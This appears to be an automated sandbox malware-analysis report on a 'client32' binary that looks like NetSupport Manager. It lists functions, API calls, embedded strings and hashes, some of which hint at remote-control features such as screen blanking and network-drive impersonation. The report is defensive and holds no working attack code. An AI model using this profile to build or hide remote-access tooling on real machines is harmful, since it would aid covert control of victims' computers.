Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
API String ID: 2171401249-3225996774
Opcode ID: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
Instruction ID: fa832722e0390e9f8a25bf370b451ec2a36a1e68e963bc0416f7044736d9f8e9
Opcode Fuzzy Hash: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
Instruction Fuzzy Hash: CD31297AD14219AFE715CFD49C417AEB7F8DB45619F0042AADC15937C0EB316500CBD1

Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 110D1378

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D12F7, 110D132A, 110D139E
IsA(), xrefs: 110D12FC, 110D13A3
cchLen<=0 || cchLen<=(int) _tcslen(pszStr), xrefs: 110D132F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
API String ID: 1528188558-323366856
Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398

Function 11063BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11063BBF

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

_swscanf.LIBCMT ref: 11063C24

Strings

%d %d %d %d %d %d %d %d %d, xrefs: 11063C1E
Y}u, xrefs: 11063BB5, 11063BBE, 11063C1C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset$_malloc_swscanf
String ID: %d %d %d %d %d %d %d %d %d$Y}u
API String ID: 226140750-1540900071
Opcode ID: cdafe33eaccb420b0754e9fe0719c12dd03f167f19b4b7f606253dbf103d93b3
Instruction ID: f29ba27cc2c913ad3b684a2f624221344e38d21cdf1a391e0ea5ddce6e1bd222
Opcode Fuzzy Hash: cdafe33eaccb420b0754e9fe0719c12dd03f167f19b4b7f606253dbf103d93b3
Instruction Fuzzy Hash: 8711BEB25006096BE321CF59CCC0EE7B7ECEF89B14F00491AF54A8B545D671F958C7A1

Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,0000000E,?,?,?), ref: 11160E88

Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 11160D4F
Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32 ref: 11160D90
Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1

LoadLibraryA.KERNEL32(?), ref: 11160E4A
LoadLibraryA.KERNEL32(hhctrl.ocx), ref: 11160E60

Strings

hhctrl.ocx, xrefs: 11160E5B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
String ID: hhctrl.ocx
API String ID: 1060647816-2298675154
Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50

Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11005981
ReleaseDC.USER32(00000000,00000000), ref: 110059BC

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1100596B, 110059A5
m_hWnd, xrefs: 11005970, 110059AA

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessReleasewsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3704029381-2830328467
Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1

Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,B24479DC), ref: 1105D59E
SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,B24479DC), ref: 1105D5A8

Strings

Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
API String ID: 3094578987-11999416
Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0

Function 1108D860 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1108D921

Strings

ImpersonateNetworkDrives, xrefs: 1108D8D0
Client, xrefs: 1108D8D5
DeleteTempUdpFile %s, xrefs: 1108D86F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
API String ID: 269201875-4101313740
Opcode ID: 684af3d6395c845e42ce0630dcc757007b5b7cfc07769ff075886b7481dcdc94
Instruction ID: eaaecb8b70183ecae029b1d74aeae058ca3e84080af2c09da11023f0102635fe
Opcode Fuzzy Hash: 684af3d6395c845e42ce0630dcc757007b5b7cfc07769ff075886b7481dcdc94
Instruction Fuzzy Hash: 04217279B442019BE314CBA4CC91F66B3A1BB84718F244A6CE5AD8B3C5CA71F841CB51

Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B96D8
SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710

Strings

Max, xrefs: 110B9690

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoMoveParametersSystemTimerWindow
String ID: Max
API String ID: 1521622399-2772132969
Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0

Function 11125860 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SendMessageA.USER32(?,000004FF,00000000,00000000,?,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004,00000000,?), ref: 111258C5
DestroyWindow.USER32 ref: 111258D9

Strings

View, xrefs: 1112587B
BlankAll, xrefs: 11125876

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyMessageSendWindow__wcstoi64
String ID: BlankAll$View
API String ID: 321412109-3798095874
Opcode ID: e19a2e47aee10cb42d15e20edb5043a77933b82c8a81f00b6565625d179844f9
Instruction ID: fa6ce96dcec4713ec44a6fea70dda2fc35063a1a39e070fc1259ad02d852b18a
Opcode Fuzzy Hash: e19a2e47aee10cb42d15e20edb5043a77933b82c8a81f00b6565625d179844f9
Instruction Fuzzy Hash: 1E1191B5A007066FE3249B768CC0AABF6EDEF48358B90082DF25747650CB74BC40C761

Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111535AC
_memmove.LIBCMT ref: 111535E6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\WCUNPACK.C, xrefs: 111535C1
n > 128, xrefs: 111535C6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0

Function 11139860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(111F1BC0), ref: 111398B1

Strings

Inited VolumeControl Subsystem (OK: 1 Ref)., xrefs: 111398DA
Initing VolumeControl Subsystem..., xrefs: 11139898
Inited VolumeControl Subsystem (OK: Ref's already exist)., xrefs: 11139936

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: IncrementInterlocked
String ID: Inited VolumeControl Subsystem (OK: 1 Ref).$Inited VolumeControl Subsystem (OK: Ref's already exist).$Initing VolumeControl Subsystem...
API String ID: 3508698243-2739245937
Opcode ID: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
Instruction ID: 8ac7705195b121ec2a8e66f06046531bb3c3c41fe71c89f648c6a83688c0c473
Opcode Fuzzy Hash: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
Instruction Fuzzy Hash: 18012B79E0451EA7CB00AFF59D41B9EF768DB82A2DF100A75E419D3A44FB35750087A1

Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000001), ref: 110395E6
EnableWindow.USER32(00000000,00000000), ref: 110395EE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110395D3
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110395CE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
